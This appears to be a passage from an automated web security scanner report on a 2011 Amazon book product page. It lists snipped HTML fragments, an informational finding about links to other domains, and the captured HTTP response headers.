<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJWKvKolhHM3CGJ903ZU7uhtabj-7WLC3n1Ns4Y0ZDCtzSIZQb292ueOKuraopIfWP0EjFCL44Wdj5fjl4aVjheGVhPyNSeM1qdwdoC-lzUlglSR1gVNp5NYqsE2PPvMqEkxs9PgjEyGQPI0bYMgRfnwPA0z7xvP.tpwHJi0nt7mzvy1zPCHs5Ixn6W36U9bX5wCEVmDb5apgbJTYgqHsUo6RM5E8z2CqkAZgOh0Q32jGlyaLGUTUANRs9S.bz.zyXHOAAps.DxTH7pYc.V32y7IM--9CsWVvJVY9tL2c.3a7OMdjw2UAnTzur9kTxhypNDooKW-4IgTWEPK2Q0To3AR2xyojgrD9oxRL-N.5HxcduaiQOu8K2rUAaVk.TkYbQV96HC4Xq3UZ8xyKBqLphfQ-ZuWwb9-KiU16dYPHf.wiIaZ7am9WvBemjX-ER.J5L0nCjVL0qhSRuaIrauas2ryAFCcPSssfQ__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJWKvKolhHM3CGJ903ZU7uhtabj-7WLC3n1Ns4Y0ZDCtzSIZQb292ueOKuraopIfWP0EjFCL44Wdj5fjl4aVjheGVhPyNSeM1qdwdoC-lzUlglSR1gVNp5NYqsE2PPvMqEkxs9PgjEyGQPI0bYMgRfnwPA0z7xvP.tpwHJi0nt7mzvy1zPCHs5Ixn6W36U9bX5wCEVmDb5apgbJTYgqHsUo6RM5E8z2CqkAZgOh0Q32jGlyaLGUTUANRs9S.bz.zyXHOAAps.DxTH7pYc.V32y7IM--9CsWVvJVY9tL2c.3a7OMdjw2UAnTzur9kTxhypNDooKW-4IgTWEPK2Q0To3AR2xyojgrD9oxRL-N.5HxcduaiQOu8K2rUAaVk.TkYbQV96HC4Xq3UZ8xyKBqLphfQ-ZuWwb9-KiU16dYPHf.wiIaZ7am9WvBemjX-ER.J5L0nCjVL0qhSRuaIrauas2ryAFCcPSssfQ__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.bericotechnologies.com/careers</a>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AN4jYU4ypQbCyXqsUe-vOVtPwRfL1vTeNjpF8wF5clB3lveVwVclTIiZEXQuj8BZtv9w7TxL9CpyREoJ9QF7iaAVV8tQKyE4EKrS.wvWRiwr9TcR.qsg2p5lpi2mAGsSHtzXs3L124Wnr-pvOEyuCBv72xdJ-YoRWowVbRPcOIAQHDpvA.9H5w1dJO8FW2G8RhQp2dcvAyyyi6l2kFkqWapoBvSI0qHB6DDihxZX0Tn.t.GyNiB6Ion97oh1tl.34cDYn54bXxipUPSVoLCTUgLUmzZLHBK163CToTzIRCMLC.nGnYCG6vqnofhm15Ch2qpTeP9SNG5reRSNHFgeu9IhSM-x3Kep5wp7XO6wgzjwtlTV4g4jWOqN31sSAR-AqvYKMLqP0kaTWJ4vkTQdOLeevyWnegqnor1p6FsRiz0N469L89YmHU646oM1i1GW3tRCYaS0B20SqU72T-z4USTTZM8QE2rmMMZn-QMWJtwS&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AN4jYU4ypQbCyXqsUe-vOVtPwRfL1vTeNjpF8wF5clB3lveVwVclTIiZEXQuj8BZtv9w7TxL9CpyREoJ9QF7iaAVV8tQKyE4EKrS.wvWRiwr9TcR.qsg2p5lpi2mAGsSHtzXs3L124Wnr-pvOEyuCBv72xdJ-YoRWowVbRPcOIAQHDpvA.9H5w1dJO8FW2G8RhQp2dcvAyyyi6l2kFkqWapoBvSI0qHB6DDihxZX0Tn.t.GyNiB6Ion97oh1tl.34cDYn54bXxipUPSVoLCTUgLUmzZLHBK163CToTzIRCMLC.nGnYCG6vqnofhm15Ch2qpTeP9SNG5reRSNHFgeu9IhSM-x3Kep5wp7XO6wgzjwtlTV4g4jWOqN31sSAR-AqvYKMLqP0kaTWJ4vkTQdOLeevyWnegqnor1p6FsRiz0N469L89YmHU646oM1i1GW3tRCYaS0B20SqU72T-z4USTTZM8QE2rmMMZn-QMWJtwS&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AN4jYU4ypQbCyXqsUe-vOVtPwRfL1vTeNjpF8wF5clB3lveVwVclTIiZEXQuj8BZtv9w7TxL9CpyREoJ9QF7iaAVV8tQKyE4EKrS.wvWRiwr9TcR.qsg2p5lpi2mAGsSHtzXs3L124Wnr-pvOEyuCBv72xdJ-YoRWowVbRPcOIAQHDpvA.9H5w1dJO8FW2G8RhQp2dcvAyyyi6l2kFkqWapoBvSI0qHB6DDihxZX0Tn.t.GyNiB6Ion97oh1tl.34cDYn54bXxipUPSVoLCTUgLUmzZLHBK163CToTzIRCMLC.nGnYCG6vqnofhm15Ch2qpTeP9SNG5reRSNHFgeu9IhSM-x3Kep5wp7XO6wgzjwtlTV4g4jWOqN31sSAR-AqvYKMLqP0kaTWJ4vkTQdOLeevyWnegqnor1p6FsRiz0N469L89YmHU646oM1i1GW3tRCYaS0B20SqU72T-z4USTTZM8QE2rmMMZn-QMWJtwS&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">ria.softwebsolutions.com</a>
...[SNIP]...
<a href="http://www.amazon.com/Professional-Silverlight-Wrox-Programmer/dp/0470650923/ref=pd_bxgy_b_img_a"><img src="http://ecx.images-amazon.com/images/I/41L0tdeaY2L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="75" alt="Professional Silverlight 4 (Wrox Programmer to Programmer)" id="bxgy_img_a" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Microsoft-Silverlight-Data-Services-Cookbook/dp/1847199844/ref=pd_bxgy_b_img_b"><img src="http://ecx.images-amazon.com/images/I/51ZBCnP8%2B0L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Microsoft Silverlight 4 Data and Services Cookbook" id="bxgy_img_b" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Microsoft-Silverlight-Step/dp/073563887X/ref=pd_bxgy_b_img_c"><img src="http://ecx.images-amazon.com/images/I/51ucwGaw5gL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Microsoft Silverlight 4 Step by Step (Step By Step (Microsoft))" id="bxgy_img_c" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51ZBCnP8%2B0L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51ucwGaw5gL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/512N51%2BQbGL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51lFeW7HogL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading…" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="s9DpEntity" id="s9DpEntity" style="height: 200px;"><img style='padding-left: 130px; padding-top: 20px;' src='http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif' alt='loading' /><noscript>
...[SNIP]...
<td valign="top" class="faceout"><img src="http://ecx.images-amazon.com/images/I/41L0tdeaY2L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="50" alt="Professional Silverlight 4 (Wrox Programmer to Programmer)" height="50" border="0" /></td>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Action-Pete-Brown/dp/1935182374/ref=pd_cp_b_1_img" id="pd_cp_b_1_img_1935182374" ><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Silverlight 4 in Action" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Pro-Silverlight-4-Matthew-MacDonald/dp/1430229799/ref=pd_cp_b_2_img" id="pd_cp_b_2_img_1430229799" ><img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Pro Silverlight 4 in C#" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Microsoft-Silverlight-Data-Services-Cookbook/dp/1847199844/ref=pd_cp_b_3_img" id="pd_cp_b_3_img_1847199844" ><img src="http://ecx.images-amazon.com/images/I/51ZBCnP8%2B0L._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Microsoft Silverlight 4 Data and Services Cookbook" height="50" border="0" /></a>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&nodeId=518316">
...[SNIP]...
<td>


                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" /> Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?

    <b>
...[SNIP]...
<a href="/ref=footer_logo/192-2919974-2112928"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

22.371. http://www.amazon.com/gp/product/0470650923 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/gp/product/0470650923

Issue detail

The page was loaded from a URL containing a query string:

http://www.amazon.com/gp/product/0470650923?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0470650923

The response contains the following links to other domains:

http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml
http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://ecx.images-amazon.com/images/I/41L0tdeaY2L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg
http://ecx.images-amazon.com/images/I/41L0tdeaY2L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg
http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/512N51+QbGL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://ecx.images-amazon.com/images/I/51ZBCnP8+0L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51ZBCnP8+0L._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://ecx.images-amazon.com/images/I/51ucwGaw5gL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://g-ecx.images-amazon.com/images/G/01/Books/grutty/burst/buyback_75-b._SS75_V174666444_.gif
http://g-ecx.images-amazon.com/images/G/01/books/student/50_amazon_student._V187616879_.gif
http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif
http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16piv._V172849515_.png
http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif
http://g-ecx.images-amazon.com/images/G/01/kindle/cascade/read-first-chapter-free._V201174422_.png
http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif
http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif
http://rd.a9.com/srv/redirect/?info=AJh.UIsAndPZ-tyA81vCehjSNOzA1sKz4Q2yyks0WIROJNFqYqbV9ia8jAvOaHR0iCv17z4V16fk75WoTP6fKXdZ3Pu7qsbaHhZkVyr7XRvqcr6Z-srM5fKKrPzM0wX8y-MEov1Fp6KQ3rWVKy9MJPXgF1EUTZ09M6Wo09bFNmpMmXkdFo82mw03phPVBGhoZzGw8jNTZEMI6QVyO3aPIXlG.9xmO762jHMRBDmoEQyzYWyfzqmSkdN1ltbkUzDa-JnxXGpAttsVXXBo-Q9Mcy0QdCSCFaDFUdSjV-YD-2zDUD7E0XudQ7tJNcKmfH9r0ysLd0BOQfWF3rBVypDgxFuXZ0JFFjhZR4KmX1r7zkdrm6mjTgkhbby9hzB2ab2rtOrENaYlXildaYS8eeOqG1nPydIcBh324YE1sBkgnf87pheezTjIQru-kSnipZrUO8S2HGg7UQ2PFjxNMq2MS6oHbjuGYyPB4mfmC4yMBAGzoXKWwkwDJ0LHCPhWO9ry-3wT-hv.bXnS&awt=1&s=
http://rd.a9.com/srv/redirect/?info=AMuK3WTjek7KOD8NVFoBBdu6uW6-JS8A8u896NkYCvmleo0Gqy.5vXoBvuH8CY7FeSNAtCRln3wZe9N3fCPo7SwhW22qqztVAWq9L2iJYLEj5j5T2NAGW0eo4uZ4HJ3aeyQk109Q8bf3NiHTWk2ob9HDT1QazZviXO3-L61wOvvWWwcJLfiVXcYt5qr.R3bGboSfU06Jdoj0rz05yZgx.xioGH.hBDZSsI3kj-Fo50KJRQf947s6cJ3IbDr4mOKzFI.OQDHoTIQGX5gxGFYNh2osDvMJSgVN6iTesWCMfuEmSXHfy.os76iLrG1HbWcL67wBnVwNfm.wNHuHOwiVzSc3bR2YHhUKFQ.GDV8FDrMf6AnNOMDrew9GPR-ooQ7VGrDpmyvDW5k.UftNXlMVayrCdVvY0vpg87PH.MXXNv4FPxFS5ZmQnBEh3k5INLchw1sxx-IfOOpcGPkzJFKV-j0i7mox858W1Q__&awt=1&s=
http://rd.a9.com/srv/redirect/?info=AOHH48FUAXr-xwiPiAACFq.m5W9AVBHMTMhLRzWUhX01wkWWelr7vEZfVF85PjEhfPpdvAWGbYputjqEHcHqOUtRuhNR7nugFZRvHdoHupR5pwDc9eBUZUkiHGHO46pOFx6AYUHpsKMatWQaqYClpmnpWXJ-BVCesMu3HHJCSJkLskNfoktE84fsXHHjofsRe0lUoF2wiJhd-h-Frvz9AlukRFw2YzWdTCJEm7JUmFHk93lQflbgsIc4C3JNDV.mPxY.XPBi-tUfuocNcYRmtVxASdy6QBDX.RE9nEigQQryxRK-am.rpz6Dmlkix8IL3nupcpFeNpPJVwHSgAkI04X2CHE-OGghYUw2JTxx78oFa9Sp3IxCmF9rCbB6lFP8iLbLeWk0eODYblHuH1F9aKmZn3VLDfgrdd-1FCNoL7em3ff4OvA6qXxddfXsmIie-WCLByDbw6tUYBvynOi.jZahEqwdsiU3GVtN76rTbO0B&awt=1&s=
http://www.amazon.ca/
http://www.amazon.cn/
http://www.amazon.de/
http://www.amazon.fr/
http://www.amazon.it/
http://www.audible.com/
http://www.dpreview.com/
http://www.endless.com/
http://www.fabric.com/
http://www.imdb.com/
http://www.shopbop.com/welcome
http://www.smallparts.com/
http://www.warehousedeals.com/
http://www.woot.com/
http://www.zappos.com/
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5869551106.css._V171084207_.css
http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css
http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:58:17 GMT
Server: Server
x-amz-id-1: 0WMQ1C7H1D0AGKM4JZ35
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: bH4rWyrYTsK4LZHmIL2ieAlYS+RL6u1roVnOdufNe10qdsKkCFlEhxaaALRAW9TF
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=179-7922704-8063117; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=k2EotcbhQScFMoytBcrIxmHgnPNpuzpA6olZEOZF3c3avha9FTSDhBROGhxh09DKOsjhCTS+UlVnW8kpSMCf5Xroy6dEDSfUW+lrumyfdtHas7r757Mo/Ni4/uRq0iwXW7i8V/G/X+HAPXlaEp95MpawVpHN53sM6EXbX6oX8Orcenrptf5pCNYQVoHDYwGKHKEFtdCzNEVh1IUXehUen6ZZMDinb3x4G8QY2Iu5kHKINKQ9tJrldJDmIEW7TyEk9+eTO7BtSR14C7GgcUNmzkuJOLOjhU43jJAmKz9J7FlJTiQSm3PaKjoPJphlOSWLM7viicgkAsVU11beNYcVrU2X1XTpTWCO6g8EPZaIFTHlJFdt1V/pYM3KErWf9DN8xfB2KNs91KVHsV3DsHLVefEhXx1LM7kfHlvrcEJbgaA9X8E+2SRvaBlCokfFzIMyjdsn7NtwDtI=; path=/; domain=.amazon.com; expires=Sun Feb 06 15:58:17 2011 GMT
Content-Length: 413553

<html>
<head>

<style type="text/css">
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/41L0tdeaY2L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="bottomLeft">
<img src="http://g-ecx.images-amazon.com/images/G/01/kindle/cascade/read-first-chapter-free._V201174422_.png" id="kindleReaderSampleButton" style="cursor:pointer"/>
</td>
...[SNIP]...
<a href="https://www.amazon.com/gp/tradein/add-to-cart.html/ref=trade_new_dp_trade_btn?ie=UTF8&asin=0470650923"><img src="http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif" width="84" align="absmiddle" height="17" border="0" /></a>
...[SNIP]...
<a href="/gp/reader/0470650923/ref=sib_dp_pt#reader-link" onclick="if (typeof(SitbReader) != 'undefined') { SitbReader.LightboxActions.openReader('sib_dp_pt'); return false; }"><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/41L0tdeaY2L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" id="prodImage" width="300" height="300" onMouseOver="sitb_showLayer('bookpopover'); return false;" onMouseOut="sitb_doHide('bookpopover'); return false;" border="0" alt="Professional Silverlight 4 (Wrox Programmer to Programmer)" onmouseover="" /></a>
...[SNIP]...
on.com/gp/student/signup/info&token=3A0F170E7CEFE27BDC730D3D7344512BC1296B83&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=product-alert&pf_rd_r=0WMQ1C7H1D0AGKM4JZ35&pf_rd_t=201&pf_rd_p=1284419222&pf_rd_i=0470650923"><img src="http://g-ecx.images-amazon.com/images/G/01/books/student/50_amazon_student._V187616879_.gif" width="50" align="left" alt="Textbook Student" height="37" border="0" /></a>
...[SNIP]...
<div style="float: left; width: 75px; padding-right: 8px;"><img src="http://g-ecx.images-amazon.com/images/G/01/Books/grutty/burst/buyback_75-b._SS75_V174666444_.gif" width="75" height="75" border="0" /></div>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AMuK3WTjek7KOD8NVFoBBdu6uW6-JS8A8u896NkYCvmleo0Gqy.5vXoBvuH8CY7FeSNAtCRln3wZe9N3fCPo7SwhW22qqztVAWq9L2iJYLEj5j5T2NAGW0eo4uZ4HJ3aeyQk109Q8bf3NiHTWk2ob9HDT1QazZviXO3-L61wOvvWWwcJLfiVXcYt5qr.R3bGboSfU06Jdoj0rz05yZgx.xioGH.hBDZSsI3kj-Fo50KJRQf947s6cJ3IbDr4mOKzFI.OQDHoTIQGX5gxGFYNh2osDvMJSgVN6iTesWCMfuEmSXHfy.os76iLrG1HbWcL67wBnVwNfm.wNHuHOwiVzSc3bR2YHhUKFQ.GDV8FDrMf6AnNOMDrew9GPR-ooQ7VGrDpmyvDW5k.UftNXlMVayrCdVvY0vpg87PH.MXXNv4FPxFS5ZmQnBEh3k5INLchw1sxx-IfOOpcGPkzJFKV-j0i7mox858W1Q__&awt=1&s=" rel="nofollow">60+ <b>
...[SNIP]...
</a>
